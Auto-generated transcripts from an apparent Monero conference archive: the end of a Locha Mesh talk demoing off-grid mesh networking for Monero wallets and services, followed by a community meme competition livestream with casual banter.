with the Monero daemon over the Luchamesh only. And now it has received the incoming transaction to its wallet. And this information, he has received over the Luchamesh. The Luchamesh is a mesh, peer-to-peer, decentralized mesh network that only needs another node in range. So, it needs to be in range in order to be able to be part of the same mesh. And when there are going to exist more mesh isolated in cities or distributed in different countries, what we will have is bridges or long range distant radio that will connect one mesh with another over the Internet as a bridge or gateway or also with long range radio. So, we're going to connect cities with each other and we'll have this mesh network not isolated anymore in each city but interconnected to make a huge network of devices that are capable of delivering messages, data, and information like in this case, all over the world. So, once everything is running inside the mesh and you won't need to go to the Internet anymore because miners will be inside the Luchamesh, servers will be running inside the Luchamesh, and Monero remote nodes will also be there, wallets, everything will run there. You won't need to use the Internet anymore. What is the advantage of this is that as you can see, you can have a developer launch bot that you can build yourself in your house and you won't need to be identified or KYC by anyone in order to be able to use the Luchamesh. So, we are making a custom hardware and this is important for us because, well, this custom hardware that you can see there on the revision hardware that we have is the Terpial and it's made out of pieces and components that you can buy online today. So, you can do yourself a version of it with all the shell parts too. So, if you do this and you do it in your house and you build it yourself, you won't need to identify yourself or share your ID or scan your face with any service provider, ISPs, or government in order to be able to communicate and make use of applications in this Luchamesh network. So, it is important for us to make the hardware, the custom hardware, because that enables us to make, to develop the firmware from scratch in order to make them open source. So, in order to be able to make it public available for everyone to use so that you can build your own or buy the ones that we are going to sell, instead of using already existing equipment for radio communications, which currently most of them, or if not all of them, depend on closed source tools for flashing and proprietary firmware. So, the two devices communicate with each other over radio in the ISM unlicensed bands, 950 megahertz and 868 megahertz. The routing protocol that we are building is based on AODV version 2 and we have full IPv6 support. So, any application software server which currently is capable of working with IPv6 address in the IPv, in the IP protocol can run on the Luchamesh without any extra work. So, Luiz is going to show you, for example, SSH access web servers, monadoblock sync, not only the wallet itself is going to be, it is going to work inside the Luchamesh, messaging apps, remote nodes, you will be able to access your computer over the Luchamesh without having to use the internet. So, you won't expose your house IP address, you won't expose your phone IP address which is connected to your identity, you will be able to use the Luchamesh to do all this. So, now Luiz is going to show you how you can run a web server in a computer and access this website from another computer over the Luchamesh, completely off the grid without having to use the internet at all. So, very basic web server. So, I need to launch the browser. So, here is the browser. Here is the address of the server and the port. Okay. Okay. That is. So, this is an example of how you can run a web server in a computer, a browser, a server or a Raspberry Pi in your house and you can access to that service or that computer over SSH web HTTP and you can synchronize your wallet, you can synchronize your full node even over the Luchamesh in a peer-to-peer decentralized mesh network that is private and information can and information transmitted, the data transmits can be encrypted because we are using the unlicensed ISM bands which allows you to encrypt the information that you are sending. So, it is also private. That is why it is so important for us that the Monero community has decided, an individual has decided to support us through the CCS support crowdfunding method that they have and we understand that the Monero community is a privacy focus community and we are also too. So, we are not only enabling people to use Bitcoin and Monero without internet, we are also letting people continue being in contact with their loved ones during disaster heat countries for example or censorship, internet shutdown and blockade or infrastructure failures. So, this is more a project, a community-driven project which is open source and we invite you all in the community of makers, hackers and everyone who likes this, the privacy and the freedom of using your money to join us on our GitHub which is github.com slash btc being slash Lucha and we invite you to join us in the Lucha por la Lucha Libre which is the fight for the freedom of money. So, in this demo we wanted to show you what we are working on. As said, you can build the do-it-yourself version of the devices yourself but we also are going to sell the two devices which is battery-based mobile hotspot that is going to give you access over Wi-Fi. It is a hotspot which has a Wi-Fi AP and access point that you can access with up to four mobile phones and you can also connect it to a server like in this example through a USB cable. So, in a range if you have enough density and there are enough devices around you, you will be able to chat and make payments and sync your full note over the Lucha mesh. What we are also working on is on the radio model itself. So, the radio model that is going to be well that in the two devices is going to be available in older formats so you can use Raspberry Pi Hat for example and add it to a Raspberry Pi so it is going to be able to communicate over the Lucha mesh with others in order to offer services for example a server or a wallet, sync or a server or an electronic server or a remote monero that others can use and you will be able to get paid for that. So, you will be able to get paid using monero using RPC Pay Fiat or Bitcoin or the Lightning Network and you are going to get payments for the services you are providing to others inside the Lucha Mesh as a way to incentivize you for running these services inside the Lucha Mesh. So, you will be able to build the devices yourself, you will be able to buy the radio models that we are going to build or you can buy the more consumer ready for newbies device which is a Terpill device and so you can have all your family, relatives and friends have a two-wheel device that they can carry around with them in order for them to be able to chat with you or use the services you are providing to them from your house on your Lucha Mesh enabled computer. So, this is what we want to show you, we want to show you and this is what we've been working on for the past two years and thanks to other communities like the monero community itself we've been able to do this mostly on the nations grants that we have received but we also have a company which is the hardware company that we want to make devices in order to sell them for the common users that are not going to build them but they are going to buy them in order to be a note inside the mesh and be able to provide relay messages for others and maybe get payments for providing that service too. So, if you are interested in supporting us you can make a donation or you can join us on give hub help us test the devices the DevKit devices that we expect to have pretty soon or you can pre-order the two devices that we expect to have ready for delivery for shipment early 2021. Thank you very much. Thank you everyone Luis. Thank you very much everyone. Thank you. Hope you enjoy the rest of the DevCon. Hope you enjoy all these weekend which have been very interesting and exciting and hope to see you again if you have any question you can reach out to us at Lucha.io and you can find us on Twitter and also on github as I said previously on Twitter we are Lucha underscore I.O. Thank you everyone. Thank you for attending. Thank you.
|
Locha Mesh: Monero off the Grid
|
10.5446/50659 (DOI)
|
but it's not just a meme competition today. Of course, it's a mean meme competition. So you got the best people prepared here. We have people joining in, Diego left us, but we have Scott joining us. We have VT nerd. We have, of course, the National Security Agency giving their best memes today. So I guess before we start, I just wanna make sure that everyone is sort of set up and ready to go to the greatest extent. And that, yeah, I guess we can have time to introduce each other's too. This meme competition will be very similar to the meme competition that we did for Moneroversary. So if you saw that, you are ahead of the game. I will distribute meme templates for all of our participants to fill. And then after they fill, I will give a chance for the audience to vote. Instead of last time where we had a poll, I think we're just gonna do a thing where people mash their votes in the chat and we'll see how that goes. Because we only have 30 people watching. If we had thousands of people, then I think a poll would work. But we can just see how many people vote for which specific number in the chat. Among Lee and Scott, have you had a chance to review the instructions so far? Yeah, I read the read, sorry. But the read me, no issues, straightforward. All right, perfect, that's good news. I guess I have all this. Thank you so much for joining us, perfect timing. Yeah, I think people are gonna be excited for this meme because why wouldn't you? Of course everyone's gonna be excited. I am just getting everything situated on my end because I don't have anything to help me out. This is a very complicated process. Memes take a lot of work to get ready. Yeah, I'm super high tech. He's like PowerPoint, everything is crazy. Just like last time, we were using PowerPoint to arrange the memes for people to vote on. Nothing but the best for the community here. Okay, looks like I'm almost situated. Vic has not joined us yet, which is odd because he destroyed us last time. Vic will be joining us. He's probably busy sending out a tweet from the Monero memes account, I'm sure. Sorry, not Monero memes, but the Cake Wallet account, which is basically a meme account too. I'm sure you're aware. So, title view, let's get everything going here. All right, I think everything is situated on my end now. I know you're all waiting for me. I guess, if it's just, oh, Vic, perfect timing. We were waiting for you. Sorry, I'm late. No, it's all good. Vic, have you had a chance to log into NextCloud and see all the files that are there? Yeah, I see nine folders. Okay, perfect, nine folders. I did not peek. You did not peek. Yeah, so this- That's not why I'm late. If someone does suspiciously well, you can blame it on them cheating this time. They were given access to the ability to cheat this time. So, hopefully they didn't. We're gonna have to trust that the Monero community is a trustworthy bunch, otherwise, big problem. So, that being said, let us get started, shall we? I'll set a timer. People are sending messages. Hey, all, yes, Vic. So, under the meme competition folder, which you're not able to see if you are just watching the live stream, but otherwise, you can go through under, you know, the Defcon 2020, you have a list of nine folders. I am now giving everyone permission to open up the first folder, folder number one, and there is an image in there. I am going to screen share this for everyone who is in the live chat. It is a meme. You have a few minutes to, you have a few minutes to make the best thing out of this meme that you can. Actually, screen one is actually the preferred. All right, so I'm sharing this with YouTube. You should be able to see, I might have to go back and forth here, of course, with my different streaming computer. No, never mind, it does appear properly, perfect. So, all right, so that's a meme that you're gonna be building on. You have five minutes, so let me start the timer, and then you will put the meme in the same exact folder that you did, that you, sorry, you'll put the meme that you create in the same folder. Make sure you assign a random number to it. That's the one that the participants will vote on. And then, of course, include your name, so I know who ultimately wins. That way you can't take credit, even if you don't win, because that would be horrible, of course. All right, what are our first impressions of this meme? There's a lot that can go on here. I've never seen this meme. I have no idea what to do with it. Yeah, that's kind of the fun, I think. Sometimes that's funny. It is sometimes funny when everyone does a completely different meme and some of them aren't even funny or relevant. What do people in the audience think of this meme? What do we think of two guns, well, three guns in a car, one says something, other two guns turn around, and then the other one's silenced? Okay. So what format should it be saved in, the same JPEG? JPEG or PNG, whatever you want, and then upload it to the same folder. I will share it and arrange it such that people can see different numbers and vote on them and things. I hope the naming convention is... But make sure that you name the meme, the number one, colon, a random number, and then your name. Okay, Mac doesn't let me do colon, so I want file names. Yeah, you can do a dash or a dot. Doesn't, you know, maybe a period is fine too. We have no comments, there we go. Good meme, thank you, Andres. I appreciate you liking my meme choice here. We'll see if it's a good meme, depending on what people submit. Of course, I'm wearing my putting the fun and fungibility shirt today. Saved the normal Monero one for Sunday when I'm giving a talk about mineral coin-based output, which are much less fun than memes, I would say. But, so be it. This is a problem with the meme competition sometimes. It's all funny, everyone will laugh when the memes are done, but in the moment, everyone's busy just working on them, trying to think of something good, and they're all stressed out. I need a co-host on here just to do banter back for it. All right, that's submitted. Cool, I see yours. Now I get to do all the work of arranging them in a way where people can vote. Without giving too much away, Vic, this is a Monero meme you came up with? Oh, I couldn't think of anything Monero related. I'll lose that one. I don't know how. Somebody makes that into a Monero meme, hats off to them. This is a tough one. I just went the general route. Okay, yeah, hold on. Somebody on Twitter just corrected somebody. It's just saying it's verge currency, not it's at verge currency, not at verge, like it matters. Sorry. Oh gosh, what did you do, Vic? Are you embarrassing us? No, I'm just reading. Is this from the cake wallet account? No, nothing to do with cake or my account, just random tweets. I know you're secretly making a verge wallet in the background. I know you're all in the gulls to get the trust in our community. Exactly. Hopefully they'll accept me one day. It's a very prestigious community. You've got to build from the bottom up. You've got to start with the basic stuff like Monero. You've got to make wallets that anybody will use. Monero is such a coin that everyone treats like anything else. And eventually, you'll be good enough for the verge community. Eventually, with enough persistence. Welcoming to criticism. Anyway, that's not talking. Who's all on? Who is everybody? OK, looks like someone submitted what is the naming convention.png. Name it 01- or whatever. And then put in a random number. And then put in your actual name. The reason for the random number is because that's the number I'm going to give the audience to vote on. And that way, once I figure out which one wins, I'm able to figure out which one actually wins. And then I know the name then. Who submitted it? Yeah, I was wondering where you saw the what is naming convention. I mean, that was close enough. Who picks the winners? We're going to have to chat spam the winner. And if no one votes, then it's just going to be me. Which is biased because I know who picked the memes in, I guess. So people better vote. So you're saying this is centralized, huh? It is a very centralized. Well, that's why I thought we were just going to have a number and then no name. And then we would say, oh, that was my number. I guess anybody could claim the number in the end, though. Yeah. So this way, Justin can't pick favorites, huh? Of course. All right, Scott, how are you doing? Good, I am literally just a couple of clicks away from uploading one click away. In the meantime, look at the shirt I got from Cypher Market, Diego. Very nice. Diego is just with us. Walking all the noobs with how to use Monero. Did you say just use K-Quality? That's it. He went through the Monero GUI. He didn't go through the K-Quality. You said noobs and easy. He was complaining about the GUI as he was using it. I told you, for a K-Quality, I wondered a slogan to be, for noobs by noobs. It's a good way of putting it. Force refresh, Shane. Let's see. Oh, I see it. Download. It's fine. It's not named correctly, but it's fine. OK, you have three numbers to choose from. You only need to get better at general. Oh, actually, Isthmus just submitted it. It's never mind. All right. Isthmus. OK. It's one of the most popular ones. I'm not sure. I don't know. I don't know. I don't know. I don't know. I don't know. I don't know. I don't know. I don't know. I don't know. I don't know. OK. It's really difficult to arrange these, as you can imagine. I'm doing my best. Maybe I should specify the next time to do a two-digit number. That way, it's not going to take the entire slide. All right. I have, oh, goodness. Scott, did you take yours down again? No. OK, one second. Isthmus, mine was deleted. Espionage within. It's fine. I assigned you a random number. So you're good. I remember which one is yours. It's all that matters. OK. Time to screen share. And if you are on Twitter, sorry, not Twitter, if you're on YouTube, get ready to spam which number you believe is the best. All right. So let me share the screen. All right. Screen sharing right now. Option one. Option, well, not one. Option two. I'm not shooting off my mouth. I wonder who made that one. Option 52. Fungibility? Question mark. Option three. Minero would be better with proof of stake. Or 1337. Oh, I got the same one. That must have been Isthmus. Did I not get yours? Scott? I don't see mine on there. Oh, damn. Just write a exploit move. Write a program. Here, let me refresh. Oh, my gosh. We may have a latecomer. Pretend you haven't read any of them. Of course, refresh here. Yeah. Mine is there and the number one folder. I'm doing four sync. I don't see it. One minute. Let me see if I can get it. Yeah, I'm not seeing it. Sorry, everybody. We'll figure this out. Probably ran out of storage and yours is like, oh, no, I see it. Okay, that's good. Okay. It's fine. Let's see if I can copy this in. Copy. I mean, the meme not being visible to outside observers is pretty on-brand from Minero. All right. Last option, late submission from who knows whom. What if I were merge mine? Thankful for today's circa 2014 at the bottom there. All right, so you get to vote. Do you want option 252, 313, 37 or five? You need to vote in YouTube. Put it in the chat right now. No one has voted yet. So we will see people are quiet today. Come on, put in a vote. It is essential. It's your civic duty to vote on memes. Hope you're able to see the memes well enough given how I have to arrange these. I think we're going to do a wide one next so I can try and fit them all better. We have 24 people voting, but no one actually that's paying attention. They just have it all running on the background. I'm going to give people five more seconds to vote. Otherwise, I'm going to move on. I'm just going to choose one like the dictator I am. Okay. I can't read the text. Well, let's just crop the bottom of the meme. You see it in every single one. So Manero would be better with proof of stake or is this one here? Manero would be better with proof of stake, 1337. I'm not shooting off my mouth. Number two, fungibility question mark. You have what if I were merge mind by thankful for today or Manero would be better with proof of stake. Two, really, Vick, you like your... You said vote, so I'm trying to help you out here. Congrats. Who won? All right. Since nobody has voted other than Vick. Don't count that obviously. I think I need to be the person to decide and I think I'm going to choose the... I think I'm going to go with thankful for today's circuit 2014. Congrats Scott. You won the first round. Okay. Look, Manero would be better with proof of stake is really good admittedly. That's awesome too, Ismus. But just the fact that like this is something that actually happened in Manero's past history, right? It just makes it super, super relevant. So what if I were merge mind by thankful for today? I think is the best choice and I'm sorry, Andres, you came in too late. What if I were merge mind? That was the winner and that was by Scott. All right. Done with this. Let's pull up the second meme now. You can now open up folder number two. That's a trendy meme right now. All right. That's Bonjour. So now we get everyone in five minutes to start working on this one now too. And then I'm going to try and make the template beam work that's right work better with four participants. Okay. Alright, it's better for four participants now, so we're good. The easier for everyone to see. Alright, I'm in. Alright, you're very fast at making these. I was wondering why their live stream was all me. Let me check to see is the stream coming through an HD? I hope so. Looks like it. The stream will be an HD, I just want to make sure the quality, that's a standard. Hopefully it'll be HD when I stream. So you can read text in things. We have a custom JITSI server, but for some reason it still sometimes falls back on lower resolution than would fit in a pipe. So I don't really know what's going on there. Wish I knew. I have absolutely no idea what to do with this. For some reason people are doing a bunch of these memes right now. It's not always just a Bonjour one, but sometimes it's like goodbye and then hello. So sometimes they're paired together, sometimes it's just this one. Okay, interesting, interesting. Yeah, mine has nothing to do with the, with the bunch or my text is nothing to do with the meme. Of course, if you're in chat, please comment what you would put to you. You're welcome to put your text or the meme that goes with this. You can participate to Vick's obviously paying close attention so he's going to steal your idea. All right, let's start to get those in. Let me force sync. Let's see who else is added so far I think I want to have Vic. I'm going to grab a beer in the meantime. I'll be back. You Instead of a beer, I'm having a strawberry bubbly. It's basically the same except minus all the alcohol. Did anyone see that Topo Chico is going to make spiked seltzer next year? No, interest. Some people on the ZCashico are more furious because they're really into Topo Chico. I didn't know this actually. I was drinking their twist of lime during the first livestream that I hosted for their Future Developer Fund. I was drinking the twist of lime and they were all there like, yeah, nice. That's how I instantly got some extra brownie points with them by having my Topo Chico. What is Topo Chico? It's like, I don't know, it's some sparkling water. They sell literally just normal plain sparkling water and they sell others that have a few flavors like lime or a few things. They've really been expanding a lot. They're owned by Coca-Cola, of course. It's non-alcoholic. Yeah, but they are making alcoholic ones next year. Justin, did you get paid for this? Basically. I will say, I have not been paid by Coca-Cola, but my brother loves it so much. Basically, he holds it as if it's an ad. It's kind of funny. I'm like, I have to be like, this is not an ad. It's just Nathan. It's a very satisfied customer for some reason. But obviously, I don't waste my money. I drink my Pepsi bubbly. They're going to get my mind of metal wipes. Overpriced water. How about that? I was going to say, C3 has basically an essentially endorsed drinker of hackers drink. Did you submit yours, Scott? I'm seeing v-teaers and vicks. Once again. Yeah, I see minds are hacked and vicks. I don't know why mine isn't showing. It shows it's fully uploaded, but. That's okay. It's not the end of the world. I can just go through and. Yeah. Worst case I can always. Wait, Sarah hacked submitted one. Sarah hacked. Over another channel. Okay, you participating. Right after I arranged my grid to work with four people, a fifth person shows up. Sorry, that was just me. Ismys, are you? Wait, that was you? Okay. So Sarah ismys on behalf of Sarah hack. Okay, I see. I just figure I want to do with it. I didn't want that associated with me. You just thrown another manera contributor under the bus. Got away with it for a minute. I mean, you would have had access to figure out how to get this channel. So it is theoretically believable. Would have been shocking, but also. We're things have happened. But not that shocking. All right, let me arrange these, you know, instead of all this arranges one, two, three, four, it's all it's not very difficult to keep track of four people as long as you name them. My computer is really blinding for some reason. It's not it's not like in this, but that's okay. Almost done. Oh, look at this. One of these is a little different than the rest. All right, we got some good ones. Everyone who didn't know what to do with this. It's a good good set of templates here. All right, let's see sharing my screen now. All right, here we go. Make sure if you are on YouTube, please vote if you too much difficulty reading these. Let me know. So the first one lightning network is private. Who needs bonnero me? Bonjour. Actually, I should just number these one through four. Please continue to submit them the same way if you're participating, but like, we'll just have people vote on one, two, three or four. All right. Second one. Bonjour fungibility. Third one. If I use my Bitcoin from this whole, I become invisible. Take that manero. Bonjour. So we'll ask someone to explain that one later without giving it away. And then, you know, fourth one, manero releases new hard fork, ace a company. Bonjour. Definitely nice self deprecating meme there. I like it. I like it. All right. So last one. Now we get the, now we get it. Now you get it. We're going to have to start including an example that's not manero related in this. So we have one vote so far on today's who's voting for number four. Anyone else, please, please put your vote in. But to some extent, this is almost like the, the OG manero meme where someone was like, untraceable public ledger or like who needs privacy and like manero bashes down the wall. It is like privacy matters, privacy first. Fungibility. So it's almost like this where you could be like, who needs like, you know, you have a Bitcoin person ranting at a meetup that's talking too loud about like, what type of privacy implementations are the best and then you have manero guy coming up from his whole being like, Bonjour. Definitely, definitely a lot of scope for some other ones in this discussion. But I do like the self deprecating asic company coming in with Bonjour. Okay, apparently just one person is watching this stream and so they get to determine which one is their favorite. I'll give it another five seconds or so here, but otherwise Andres's vote for number four is going to be the victor. Clearly have to cater to their humor going forward. Yes. This person is a lot of sway. I wanted to go to the circuit win. Like what happened you're doing so well last time. I know. You hype me up. These memes just don't don't work well for you apparently. It's the memes not me. We have a vote for number three, which I'm sure someone bribed them to come on and vote for number three. Wouldn't put a pass that person. All right, now we have a split vote. Do I need to choose again? Please tell me I don't need to choose again. Well, it's between two, right? What was that? You only have to pick between the two, right? Yeah, you have to pick between the two. So number one and number two are out. You can always roll like a dice. What the dice design? Random number generator. Oh, do you need a random number? Four. Four is a good number. All right. Completely random. I am going to use extreme random. What's the name of that? Who's the one that does that? I'm going to use the super random. Oh, I thought you're going to use Gavin and Dresen's thing. No, I'm going to use this Monero. Sorry, this Google generator. But who's a person that like Walton Shane? Yeah, the Walton Shane. Congrats, I won to themselves for winning their own competition. That's a common. Oh, yeah, I remember that. Yeah, exactly. But I'm going to use the Google one instead, which is probably at least as good as a Walton Shane one. Three. Three one. Nice. All right. So that is officially Vic. Vic won that one. I don't know. I disagree. I like Scott's better. Well, the science has spoken. Science has spoken. Random number generator may forever be in your favor, Vic. How do we know Google isn't? He could have Google in his pocket too. I mean, this could be like huge. This is true. This is a big conspiracy here. Yeah, you don't know my connections. Oh, that would be intense. All right. So I need to put Vic down as the winner from number two. All right. Just to prevent you from cheating, instead of doing number three, do not open that one. You shall go to number eight. What cheating scheme does that foil? Wait there. Oh, there's somebody that. Did you already do this one? What's going on here? There's like, there's two picks and. Oh, did you combine them into one? Yeah. Yeah, combine them into one. So you can just use the zero eight one. Well, let's see how well this one will be received. It's like the opposite Kanye meme. Okay. One person likes it. Well, I'd like to include yourself. This could be dangerous. I don't know. I live in the rules that we couldn't name you because we have to like implicit. Well, now you can. Yeah. All right. There you go. I said you couldn't name people in other communities that weren't like super, super popular. Yeah. No genuinely harsh. Pretty. Bonus points to whoever knows where that second screenshot was taken. Sorry. That second image was taken. I was not in a good mood. Is that like consensus or something? No, it wasn't consensus. It was a, it was a travel real conference. I was on, I was on a panel with someone from dash, someone from Zcash, a Bitcoin core contributor. And I think that might have been it actually. We're talking about travel rule. Who was, I don't know. I was, I was just annoyed as you can tell. Oh well. Those ones from DEF CON last year. We'll see if this backfires on me. It probably will. No, I might like someone from Rio will take that and then just run with it. So I should be careful. I'm starving. I'm looking forward to having dinner after this. Why did I schedule this at 6pm central? I'm. I'm. I'm surprised the NSA hasn't given a submission there just watching. No, that's my, that's my recording computer. So. I thought it'd be more fun to actually include the logo on it. Just to prove to people that Manero has a back doors, of course. When we designed the Manero protocol, we've our first thought is how do we make sure they have the proper back door, back door they need. So it's a critical part of the discussion. I genuinely do need someone else on here as a co-host to throw a banter back. I really do. Where's Diego? He's good. He was like gone. I needed him. I. Ruben from Z coins texting me. I can tell him he can still hop on. Even if he just, just talks with me. Just to make fun. You can still join if you want. I need a co-host anyway. Well, he might actually be hopping on. Oh, good. I'll be. I think my life easier. And would end the suffering of everyone in the chat. It's all. They're dealing with some stuff. One of my, one of the best things that's helped prove to me like, wow, the community is really committed. They watched. One of the. We try to gaming live stream once. When a lot of people in the community played zero AD, which is like an open source age of empires. Like alternative. And. Everyone was like to concentrate it on the game. And I only was able to share my own screen. So they were just watching a concentrated me play a game and everyone, no one else is talking. And goodness. You're all alone, Justin. Yeah, it was just, but we had like hundreds of hours of watch time on that video. And I'm like, if people are willing to spend hundreds of hours watching this, then. Then Menero has something going for it. By the way, I submitted it, but I'm sure I got the concept of the meme wrong again. That's, I don't know. It's always funny when everyone has their own way of interpreting the meme. It really is. Right. You're just going to embarrass your daughter. It's going to be like, dad, you just didn't get it. Yeah, exactly. So big. Let me see if anyone else. I'm going to talk about my daughter when we wanted to name the wallet cake. She's like, do you know what cake means? And slang don't do it. I think we've got all four now. I think so. I don't know why they're not syncing on my end, but it's fine. I can easily copy them from browser. It takes me like an extra half second. I'm going to say, Van, I have to catch up for you. That's what true. I do have a lot of bandwidth going on over here. A lot of direct connections to people. I guess I don't need it all the way in the edge. Okay. One, two, I have three of them on here. My, I forgot to number mine. It's, it's the last one down. It's fine. The most important thing I guess is that someone names it. All right. I like all of these. They're all weird in their own way, but, and, and to be clear, I prefer if you don't actually look at them before the rest of the audience. That way you can save the surprise for everyone else. Otherwise the stream is going to be worse. All right. Everybody ready? We have some good ones here. This is the best one so far, I think. Well, thank you, Ruben for joining us. You're going to have to comment on some of these memes. I'm going to share them and you're going to have to talk about which one you think is the best. I like your background too, by the way, maybe he should. Since he will know, he's really a natural. All right, let's, I'm going to share. Here we go. Three, two, one sharing. All right. So the first one is letting me do my 129th tweet about Zcash and then broke and you stick to Monero. The second one is designing protocols to improve minor privacy and then watching mining pools publish every payout transaction anyways. That one's very relevant because I do bitch about that all the time. The third one, Monero means money. Is that a real movie? And then the fourth one is when you find out CL7 audit comes back great. And then when you find out CL7 won't be released until October. Your YouTube feed is just showing your Google search page. Is it because I see, I'm looking at YouTube right now and I see the memes. What do you guys see? Oh, now I see, no, I see the old ones. That's weird. I guess I'm really behind. Are you behind? I guess I am. Yeah, the live text to re-sync. Potentially if it's not. Sorry about that. Go ahead. These are all really good. You all have did yourselves for these. Sure. I can drop the link to the YouTube stream in here so you all get it. So that's the YouTube stream. How old were you in the first picture, Justin? That was taken last year. What? I'm 22. Wow. And the second picture is around the same age as well. Yeah, it was in November. Yeah, I have to use that. That's one of my favorite photos because I was just so angry about something or just, it clearly went through to the photographer. Do you remember what it was, what you were angry about? Someone was saying something stupid about the travel rule. Oh. So we have two votes have come in so far. Before I use those in the chat, Ruben, which one do you like of these four? I like the first one. Okay, okay. Yeah, definitely get a lot of people in the Monero community being like, dude, what the hell are you doing? And then sometimes I like some people through Zcash or like stick to your lane. How deep are your connections, man? Another guy? All those giveaways, you know, they want something back. That's awesome. So I just want to suspiciously say that when, when we're bringing in people who give a last minute vote, both times they're picking Vic. So, and the Google random. Vic. So, but it looks like, you know, two out of the three votes that came in, including Rubens went for the second option number two. So the second option, I think for that was submitted that one that was Ismus. Congratulations, Ismus. Thank you. I know this. I know, I know this annoys you a lot too. So it's funny that you were the one that made that. Yeah, Ismus and I are the two people that Vic, Vic, I see how it is in the YouTube chat yelling at someone for not voting for him. I'm going to start bribing people there and you're going to start doing a giveaway for everyone. A random person who votes for me gets gets a Monero. Pre-staging. It works. Yeah, it does. You're suddenly going to have hundreds of people voting in the chat instead of three. Three thousand votes for Vic. Exactly. Okay, so we currently have a three way tie between Scott, Vic and Ismus that each have one point each. Let me go through. Which meme do I want you all to do next? Oh, speaking of which Ruben, would you like to participate or do you want to just banter with me as we as we carry on your choice? I don't want to participate. You want to participate? Okay, in Telegram I sent you a next cloud link. Okay, got it. Yeah, so there's a bunch of folders. I'll tell you a number. You can open up the folder and there's memes in there. So we already did number one, two and eight. Okay. Let me do actually we have to do this one because it's super, super popular right now. Open up number nine, number nine. Oh, wow. Let me share this on YouTube here. This one's this one's a really popular current meme. All right. It's the Trump interview meme. It's a little different. I mean I've seen different variations of this one. So that, let's treat the box on the middle right there is the, you know, what's on the piece of paper the dude's reading. And how do we submit? Oh, I forgot to, you can submit by uploading it to the same folder. I forgot to prepare this. Did anyone actually use the, it looks like no one actually used the the Libre office template. Did they? I did. Okay, let me get that for you actually. I'll give you a little extra time, Scott. I know I said I would have a template and then I didn't. So it's my bad. I can easily open up and create or whatever. Yeah, it's, I mean, you had the other one. So it's No shit. I'm getting it. I'm getting it. For those who are watching Libre office draw is a very common tool to use for this because you know it's editable like PowerPoint or anything else, but anyone can have it without a license. So it's useful from that in that regard. Okay, Scott, in case you do want one, I did upload the template for you. You don't have to use it of course. I'm such a Microsoft. I don't have open office. I have both Rubens. I have both on all of my computers. At least on my windows. I do need for work. So long as it's not 365 and you're paying Microsoft every month. I mean, I'm not paying 365 money, but some other people are paying 365 money. I am. Exactly. All right, be just you over it seems to like this one. They think this one's going to be funny. Let's see what Trump, let's see what the word of Trump is. And just, just to say you don't have to do this, of course, you might have a simple mean that only has something on the card. You may name who the participants are, right, your choice to how much detail you want in the mean, sometimes simpler is better, sometimes complex carries across more clever means. Edit it. Okay. Okay. Okay. Yay, my first submission. See, we're able to upload there. Okay, Ruben. Yeah, I think so. Download liberal office now. It takes a while. It's like a big package. Let's see. Actually, let me update mine real quick. I just thought maybe something better. Oh, you haven't got some money. Okay, I see yours Ruben. I'm not going to say which one but one of these is a very, it's a very clever take on this meme that you would not typically see filled out in this fashion. Okay. Submission submissions from Scott vicken Ruben. Is that correct? Did you say missing? No, I have your three submission. Give me 20 seconds. Got it. Yeah, I'm almost ready. I'm going to go with it until you said, well, I still don't know where to go with it but when you said we could name the characters help. We said I could do what? Name the characters. Oh yeah, you can you can either do or don't need to name the characters, your choice. Okay, sorry, I upload the second version of mine. Okay, you have to. Okay. Submission to the context. Not an issue at all. I have no idea why yours are just not downloading on my computer despite you obviously submitting. Yeah, I would say like maybe it's because I'm running over a VPN or something but the progress bar shows it's fully uploaded. By the way guys, seeing the YouTube chat, BTC Lovera. It says birthday today. Happy birthday. Or she I don't know, it's their birthday. Hopefully this is a good birthday present but I mean, I don't know if spending time with me counts as a birthday present. Maybe most people call that an annoyance. All right, I have a hold on. Like someone else had to do this one. So I have one to have four submissions from people. I won from Ruben Scott Vic. And I don't know who one of them is just called screenshot. Who's this? I don't know. I don't know why it didn't stick. Well, hold on. Okay. Okay, I like all of these are so good. Really hard to fit five of these. It's kind of sketchy how I'm doing it now. So I'm just waiting on. Is it we? Mine should be in there now. Okay, okay, I got yours. Okay, we're good. Give me one second here will be. All right. This doesn't fit very well, but it doesn't matter. All right, here we go. Time for me to share my screen. All right, here we go. You can see it's very awkward to fit the five participants. So I'll have to read these again probably. You know, maybe I can just zoom in and scroll to the right. I don't know. Oh, gosh, the zooming worked for me. It's me right now. Oh, that definitely does not work. Okay, it's fine. First one. I've downloaded and printed the complete mineral blockchain and you can see all of the transactions and then it's a blank sheet of paper. I would not have thought of this, but it is a very clever way to do it with the main part of the meme is just blank and it still works. Second one. The message past is verges the best the very best look at this transaction graph here. The guy dude's like what third one. Bitcoin privacy set is larger than Mineros. What. Fourth, Trump represents a new comment every week handing some a message to our mineral. Minero can have value because it's a supply or mineral being like. And then the last one is number five. T s. What. Okay, I actually don't shield Trump coin. What's the what's up with the first TS slash no. That's like. No, it's like top secret no foreigners. Oh, it's like. Got it. People have clearance. We do. This is a clearance only chat as you can tell. So just because the NSA band is here to help us. So we have we have two votes that have come in the story. Yeah, two votes that have come in but they're one new person so BTC will bear us still needs to put theirs in. We have one vote from Febo for number one. We have a vote from Andres. My take wasn't that far from number four they vote for. I like all these they're all good. Look at Andre is trying to vote twice. That's not right. BTC will bear I'm waiting on you you get to number one. Oh, Vic. Man. Vic, how dare you. Hey, no influence. I'm curious and voted for you was it all three times. No, the last time they did it. They might not have heard it for me. Okay, Vic, you won with number one. I like all these. I would have voted for number four. Okay, you want to do one last one. Sure. Okay. Which one do I want. Oh, open up number five. Number five. Number five. Number six. I don't know, but I have a question. I think there's a folder on here that says do not use. It's very, don't use that one. That was, I found out several versions of this meme. This isn't like the OG version, but it is really funny. And I had to just do it. But so something to open that folder anyway. You can open it. You can open and look at it. You just can't use it. I feel like there's something better in there. That's why this whole Friday. It's the same time it means this other one I just thought was better. So I mean, all right. But you know, on that last one, you didn't give names to anybody. So to those memes. So there's no way even though BTC Leroy might be compromised, he couldn't vote for me. Which one always? You just have a certain style, Vic. As far as finger print is concerned, we don't have enough people participating for everyone to be a unique, like everyone's a unique submission style. Yeah. Individuality. So is it worth looking up this meme to cheat a little or is it just like going to be funny if I just get something from? I mean, you can look it up, but like, I don't know how that would help you that much. Yeah. The bucket and the bucket is a bucket's a killer thing. Yeah. There's like five characters in this. My plots aren't that complex. I wonder how long real meme generators like, you know, the people that start these views, how long do they have? They have probably like 12 hours a day to this. Can you imagine like a meme sweatshop? Oh man. We should have our own Monero meme sweatshopper, the Z coin meme sweatshopper, just competing against each other. Like one of those old writer rooms where they're just like, we need 